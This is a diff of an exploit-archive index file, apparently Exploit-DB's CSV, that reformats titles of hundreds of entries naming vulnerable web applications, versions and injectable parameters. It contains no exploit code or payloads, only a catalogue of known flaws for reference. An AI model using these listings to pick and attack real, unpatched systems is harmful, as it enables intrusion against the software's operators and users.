+34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/webseal?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19/7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 34919,platforms/php/webapps/34919.txt,"Skybluecanvas 1.1 r237 - 'admin.php' Directory Traversal",2009-07-16,MaXe,php,webapps,0 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure",2014-10-07,"Le Ngoc Son",asp,webapps,0 @@ -34618,7 +34619,7 @@ id,file,description,date,author,platform,type,port 35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' SQL Injection",2010-11-26,KnocKout,php,webapps,0 35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 - SQL Injection / Cross-Site Scripting",2010-11-30,BugTracker.NET,asp,webapps,0 35035,platforms/cgi/webapps/35035.txt,"AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps,0 -35036,platforms/php/webapps/35036.txt,"Joomla! Component Annuaire - Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0 +35036,platforms/php/webapps/35036.txt,"Joomla! Component Annuaire - 'index.php?id' SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0 35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - Local File Inclusion",2014-10-22,Vulnerability-Lab,ios,webapps,8000 35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution",2014-10-22,Vulnerability-Lab,ios,webapps,80 35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)",2014-10-22,"Glafkos Charalambous",windows,webapps,0 @@ -34638,7 +34639,7 @@ id,file,description,date,author,platform,type,port 35057,platforms/php/webapps/35057.py,"WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload",2014-10-25,"Claudio Viviani",php,webapps,0 35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' SQL Injection",2010-12-07,KnocKout,php,webapps,0 -35063,platforms/php/webapps/35063.txt,"Zimplit CMS - 'zimplit.php' File Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 +35063,platforms/php/webapps/35063.txt,"Zimplit CMS - 'zimplit.php?File' Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35064,platforms/php/webapps/35064.txt,"Zimplit CMS - 'English_manual_version_2.php?client' Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 35066,platforms/php/webapps/35066.txt,"WordPress Plugin Processing Embed 0.5 - 'pluginurl' Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 @@ -34772,7 +34773,7 @@ id,file,description,date,author,platform,type,port 35265,platforms/php/webapps/35265.php,"WordPress Plugin Recip.ly 1.1.7 - 'uploadImage.php' Arbitrary File Upload",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Persistent Cross-Site Scripting",2014-11-17,"Avinash Thapa",php,webapps,0 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass (1)",2014-11-17,"Project Zero Labs",hardware,webapps,0 -35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 +35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - (Authentication Bypass) Insecure Cookies",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35285,platforms/php/webapps/35285.txt,"WordPress Plugin Feature Slideshow 1.0.6 - 'src' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35286,platforms/php/webapps/35286.txt,"WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35287,platforms/php/webapps/35287.txt,"WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 @@ -34800,7 +34801,7 @@ id,file,description,date,author,platform,type,port 35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",php,webapps,80 35323,platforms/php/webapps/35323.md,"MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps,0 35324,platforms/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 -35325,platforms/hardware/webapps/35325.txt,"NETGEAR WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 +35325,platforms/hardware/webapps/35325.txt,"NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,php,webapps,0 @@ -34812,11 +34813,11 @@ id,file,description,date,author,platform,type,port 35335,platforms/php/webapps/35335.html,"Drupal Module CAPTCHA - Security Bypass",2011-02-11,anonymous,php,webapps,0 35336,platforms/php/webapps/35336.txt,"TaskFreak! 0.6.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 35337,platforms/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 -35338,platforms/php/webapps/35338.txt,"TaskFreak! 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 +35338,platforms/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 35340,platforms/php/webapps/35340.txt,"WordPress Plugin wpDataTables 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps,0 35341,platforms/php/webapps/35341.py,"WordPress Plugin wpDataTables 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",php,webapps,0 35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0 -35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot Parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 +35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - 'robot' SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 35346,platforms/php/webapps/35346.txt,"WordPress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 @@ -34825,7 +34826,7 @@ id,file,description,date,author,platform,type,port 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35353,platforms/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 -35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 +35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php?words_exact' SQL Injection",2014-11-25,bard,php,webapps,80 35367,platforms/php/webapps/35367.txt,"Crea8Social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 @@ -34998,7 +34999,7 @@ id,file,description,date,author,platform,type,port 35647,platforms/php/webapps/35647.txt,"SyCtel Design - 'menu' Multiple Local File Inclusions",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 35648,platforms/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 -35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0 +35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0 35651,platforms/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35657,platforms/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0 @@ -35018,7 +35019,7 @@ id,file,description,date,author,platform,type,port 35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Inclusion / Arbitrary File Upload",2011-04-28,KedAns-Dz,php,webapps,0 35682,platforms/php/webapps/35682.txt,"Tine 2.0 - 'vbook.php' Cross-Site Scripting",2011-04-30,"AutoSec Tools",php,webapps,0 35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting",2011-05-02,"Patrick Webster",java,webapps,0 -35684,platforms/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 - selfserviceSaveOk Parameter Cross-Site Scripting",2011-05-02,"AutoSec Tools",php,webapps,0 +35684,platforms/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 - 'selfserviceSaveOk' Cross-Site Scripting",2011-05-02,"AutoSec Tools",php,webapps,0 35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35700,platforms/php/webapps/35700.txt,"YaPiG 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 - 'lang' Cross-Site Scripting",2011-05-03,"AutoSec Tools",php,webapps,0 @@ -35167,9 +35168,9 @@ id,file,description,date,author,platform,type,port 35942,platforms/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps,0 35943,platforms/php/webapps/35943.txt,"Chyrp 2.x - '/admin/help.php' Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,Wireghoul,php,webapps,0 35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - '/includes/JavaScript.php?action' Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 -35945,platforms/php/webapps/35945.txt,"Chyrp 2.x - URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0 -35946,platforms/php/webapps/35946.txt,"Chyrp 2.x - '/includes/lib/gz.php' File Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0 -35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0 +35945,platforms/php/webapps/35945.txt,"Chyrp 2.x - 'action' Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0 +35946,platforms/php/webapps/35946.txt,"Chyrp 2.x - '/includes/lib/gz.php?File' Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0 +35947,platforms/php/webapps/35947.txt,"Chyrp 2.x swfupload Extension - 'upload_handler.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0 35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' SQL Injection",2011-07-15,Lazmania61,php,webapps,0 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' SQL Injection",2011-07-15,Lazmania61,php,webapps,0 @@ -35309,7 +35310,7 @@ id,file,description,date,author,platform,type,port 36159,platforms/php/webapps/36159.txt,"Zeuscart 4.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36161,platforms/php/webapps/36161.txt,"WordPress Plugin Easy Social Icons 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80 -36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 - bin/view/Main/Jump newtopic Parameter Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0 +36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 - '/bin/view/Main/Jump?newtopic' Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0 36163,platforms/php/webapps/36163.txt,"TWiki 5.0.2 SlideShowPlugin - Slide Show Pages URI Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0 36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 @@ -35338,7 +35339,7 @@ id,file,description,date,author,platform,type,port 36194,platforms/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 - 'more' Object HTML Injection",2011-09-30,"Paul Davis",php,webapps,0 36195,platforms/php/webapps/36195.txt,"WordPress Theme Trending 0.1 - 'cpage' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 36196,platforms/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' SQL Injection",2011-10-02,Rem0ve,php,webapps,0 -36197,platforms/php/webapps/36197.txt,"ezCourses - admin.asp Security Bypass",2011-10-01,J.O,php,webapps,0 +36197,platforms/php/webapps/36197.txt,"ezCourses - 'admin.asp' Security Bypass",2011-10-01,J.O,php,webapps,0 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - '/admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80 @@ -35389,8 +35390,8 @@ id,file,description,date,author,platform,type,port 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 36282,platforms/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injections",2011-11-02,"High-Tech Bridge SA",php,webapps,0 36283,platforms/php/webapps/36283.txt,"S9Y Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 -36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - symphony/publish/images filter Parameter Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0 -36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 +36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - '/symphony/publish/images?filter' Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0 +36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - '/symphony/publish/comments?filter' SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 36286,platforms/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Local File Disclosure",2011-11-04,"Todor Donev",hardware,webapps,0 36287,platforms/php/webapps/36287.txt,"WordPress Theme Bonus 1.0 - 's' Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 @@ -35420,8 +35421,8 @@ id,file,description,date,author,platform,type,port 36324,platforms/php/webapps/36324.txt,"WordPress Plugin Advanced Text Widget 2.0 - 'page' Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 36325,platforms/php/webapps/36325.txt,"WordPress Plugin Adminimize 1.7.21 - 'page' Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 36326,platforms/php/webapps/36326.txt,"WordPress Plugin Lanoba Social 1.0 - 'action' Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 -36328,platforms/php/webapps/36328.txt,"TA.CMS - '(TeachArabia) index.php?id' SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 -36329,platforms/php/webapps/36329.txt,"TA.CMS - (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 +36328,platforms/php/webapps/36328.txt,"TA.CMS (TeachArabia) - 'index.php?id' SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 +36329,platforms/php/webapps/36329.txt,"TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 36330,platforms/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 @@ -35439,13 +35440,13 @@ id,file,description,date,author,platform,type,port 36347,platforms/php/webapps/36347.txt,"Hastymail2 - 'rs' Cross-Site Scripting",2011-11-22,HTrovao,php,webapps,0 36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 - SQL Injection",2011-11-23,anonymous,php,webapps,0 36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 - SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 -36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 - 'index.php' hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 +36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 - 'index.php?hal' SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36351,platforms/php/webapps/36351.txt,"Balitbang CMS 3.3 - 'alumni.php?hal' SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 -36353,platforms/jsp/webapps/36353.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/mibdiscover node Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 -36354,platforms/jsp/webapps/36354.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/configurationpoll.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 -36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/ping.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 -36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/statuspoll.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 -36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/traceroute.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36353,platforms/jsp/webapps/36353.txt,"HP Network Node Manager (NMM) i 9.10 - '/nnm/mibdiscover?node' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36354,platforms/jsp/webapps/36354.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/configurationpoll.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/ping.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/statuspoll.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/traceroute.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - Cross-Site Request Forgery",2015-03-11,"Luis Santana",php,webapps,0 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 36363,platforms/php/webapps/36363.txt,"WordPress Plugin Skysa App Bar - 'idnews' Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 @@ -35461,16 +35462,16 @@ id,file,description,date,author,platform,type,port 36374,platforms/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0 36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php URI Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 +36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 - 'lib/controllers/CentralController.php' URI Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - '/lib/controllers/CentralController.php?id' SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36382,platforms/php/webapps/36382.txt,"WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36383,platforms/php/webapps/36383.txt,"WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injections",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36385,platforms/php/webapps/36385.txt,"Joomla! Component com_simplephotogallery 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0 -36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php' task Parameter Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0 +36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php?task' Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36481,platforms/php/webapps/36481.txt,"WordPress Plugin TheCartPress 1.6 - 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,php,webapps,0 -36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 - administrator/index.php URI Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0 +36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 - 'administrator/index.php' URI Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36408,platforms/php/webapps/36408.txt,"WordPress Plugin Pretty Link 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum (SMF) 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0 36413,platforms/php/webapps/36413.txt,"WordPress Plugin SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 @@ -35567,7 +35568,7 @@ id,file,description,date,author,platform,type,port 36549,platforms/php/webapps/36549.txt,"Joomla! Component com_contushdvideoshare 1.3 - 'id' SQL Injection",2012-01-12,Lazmania61,php,webapps,0 36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting",2012-01-16,Atmon3r,php,webapps,0 36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 -36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 36559,platforms/php/webapps/36559.txt,"WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0 @@ -35619,8 +35620,8 @@ id,file,description,date,author,platform,type,port 36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0 36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0 36624,platforms/php/webapps/36624.txt,"Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0 -36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php' sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0 -36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php getParam()' Multiple Cross-Site Scripting Vulnerabilities",2012-01-25,"High-Tech Bridge SA",php,webapps,0 +36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php?sCategory' SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0 +36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php?getParam()' Multiple Cross-Site Scripting Vulnerabilities",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0 36629,platforms/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 @@ -35642,7 +35643,7 @@ id,file,description,date,author,platform,type,port 36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - '/Interface/patient_file/encounter/trend_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - 